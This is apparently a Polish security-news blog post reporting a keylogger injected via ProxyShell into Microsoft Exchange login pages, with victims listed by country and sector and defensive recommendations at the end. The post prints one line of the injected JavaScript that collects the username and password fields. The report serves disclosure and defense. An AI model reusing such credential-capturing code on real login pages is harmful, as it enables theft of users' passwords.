Menu dostępności

Keylogger kradnący dane logowania w Microsoft Exchange Server

Keylogger kradnący dane logowania w Microsoft Exchange Server

W dzisiejszym poście opiszemy ciekawy, nowo odkryty keylogger, który kradnie dane uwierzytelniające użytkowników ze strony logowania do poczty Microsoft Exchange.

Wyrafinowany keylogger odkryli eksperci z Security Center (PT ESC) w Positive Technologies podczas badania incydentu związanego z zaatakowanym serwerem Microsoft Exchange. Był on ukryty na stronie głównej serwera, służącej logowaniu do poczty. Problem stanowi poważne naruszenie bezpieczeństwa, wpływające na firmy i organy rządowe na całym świecie.

Szczegóły dotyczące keyloggera na Exchange

Szkodliwy kod został wykryty w funkcji clkLgn() strony głównej serwera.

Keylogger rejestruje dane uwierzytelniające, takie jak nazwy użytkowników i hasła, i przechowuje je w pliku, do którego można uzyskać dostęp za pośrednictwem określonej ścieżki internetowej. W ataku wykorzystano lukę ProxyShell – dobrze udokumentowany błąd w zabezpieczeniach serwerów Microsoft Exchange. Atakujący, wykorzystując ją, mogli wstrzyknąć kod keyloggera na stronę główną serwera.

Hakerzy wykorzystali następujący fragment kodu:

var ObjectData = "ObjectType=" + escape(curTime + "\t" + gbid("username").value + "\t" + gbid("password").value) + "&uin=" + Math.random().toString(16).substring(2);

Ponadto osoby atakujące zmodyfikowały plik „logon.aspx” w celu przetworzenia uzyskanych danych uwierzytelniających i przekierowania ich do pliku dostępnego przez Internet. Umożliwiło im to uzyskanie i wydobycie poufnych danych logowania w sposób niezauważony.

Źródło: Positive Technologies
Kod zainfekowanego pliku „logon.aspx”. Źródło: Positive Technologies.

Dochodzenie wykazało, że atak dotknął ponad 30 ofiar, z których większość stanowiły agencje rządowe. Wśród dotkniętych podmiotów znajdują się instytucje edukacyjne, korporacje i firmy informatyczne.

Ataki dotknęły różne kraje w Afryce i na Bliskim Wschodzie, takie jak Rosja, Zjednoczone Emiraty Arabskie, Kuwejt, Oman, Niger, Nigeria, Etiopia, Mauritius, Jordania i Liban.

Jak chronić się przed tego typu atakiem?

Positive Technologies powiadomiła wszystkie organizacje, których dotyczy problem, i zaleciła ograniczenie zagrożenia. Firmom korzystającym z serwerów Microsoft Exchange zaleca się:

  1. Sprawdzenie, czy serwer Exchange nie został skompromitowany – wyszukaj kod keyloggera na stronie głównej serwera Microsoft Exchange.
  2. Załatanie luk w zabezpieczeniach – upewnij się, że wszystkie znane luki, w tym ProxyShell, są niezwłocznie załatane.
  3. Monitorowanie dzienników logów – regularnie monitoruj dzienniki serwera pod kątem nietypowej aktywności i prób nieautoryzowanego dostępu.
  4. Zwiększenie środków bezpieczeństwa – wdróż uwierzytelnianie wieloskładnikowe i inne zaawansowane środki bezpieczeństwa w celu ochrony przed kradzieżą danych uwierzytelniających.

Opisany incydent podkreśla kluczowe znaczenie utrzymywania solidnych zabezpieczeń cybernetycznych i zachowania czujności wobec zmieniających się zagrożeń.

Ponieważ przestępcy w dalszym ciągu wykorzystują luki w powszechnie używanym oprogramowaniu, organizacje muszą nadać priorytet proaktywnym środkom bezpieczeństwa, aby chronić swoje wrażliwe informacje.

Popularne

FIFA i Broken Access Control. Jak konto bez uprawnień uzyskało dostęp do systemów Mistrzostw Świata 2026

FIFA i Broken Access Control. Jak konto bez uprawnień uzyskało dostęp do systemów Mistrzostw Świata 2026

16 czerwca, czyli zaledwie pięć dni po rozpoczęciu Mistrzostw Świata 2026, badaczka cyberbezpieczeństwa działająca pod pseudonimem „BobDaHacker” opisała na swoim blogu lukę odkrytą w systemach FIFA. Według...
External MFA w Microsoft Entra ID – koniec Custom Controls

External MFA w Microsoft Entra ID – koniec Custom Controls

MFA, czyli uwierzytelnianie wieloskładnikowe, opiera się na prostej zasadzie: samo hasło nie wystarcza. Po wpisaniu loginu i hasła użytkownik musi jeszcze potwierdzić swoją tożsamość drugim składniki...
Masowa kampania password spray wymierzona w Azure CLI

Masowa kampania password spray wymierzona w Azure CLI

Cyberprzestępcy prowadzą zakrojoną na szeroką skalę kampanię password spray, wymierzoną w środowiska Microsoft 365 za pośrednictwem Azure CLI, o czym informuje Huntress – firma zajmująca się cyberbezpiec...
Ośmioletnia luka w Samsung KNOX. Miliony urządzeń Galaxy były narażone na ataki!

Ośmioletnia luka w Samsung KNOX. Miliony urządzeń Galaxy były narażone na ataki!

Badacze odkryli ośmioletnią lukę bezpieczeństwa, dotyczącą niemal wszystkich urządzeń Samsung od Galaxy S9 do S25. Została sklasyfikowana jako podatność o wysokim stopniu zagrożenia – CVSS 7.8. Luka...
Krytyczna luka w Oracle E-Business Suite już wykorzystywana przez cyberprzestępców. Zagrożone systemy finansowe przedsiębiorstw!

Krytyczna luka w Oracle E-Business Suite już wykorzystywana przez cyberprzestępców. Zagrożone systemy finansowe przedsiębiorstw!

Administratorzy korzystający z Oracle E-Business Suite powinni jak najszybciej zweryfikować stan swoich systemów. Eksperci ds. cyberbezpieczeństwa potwierdzili bowiem aktywne wykorzystywanie krytycznej pod...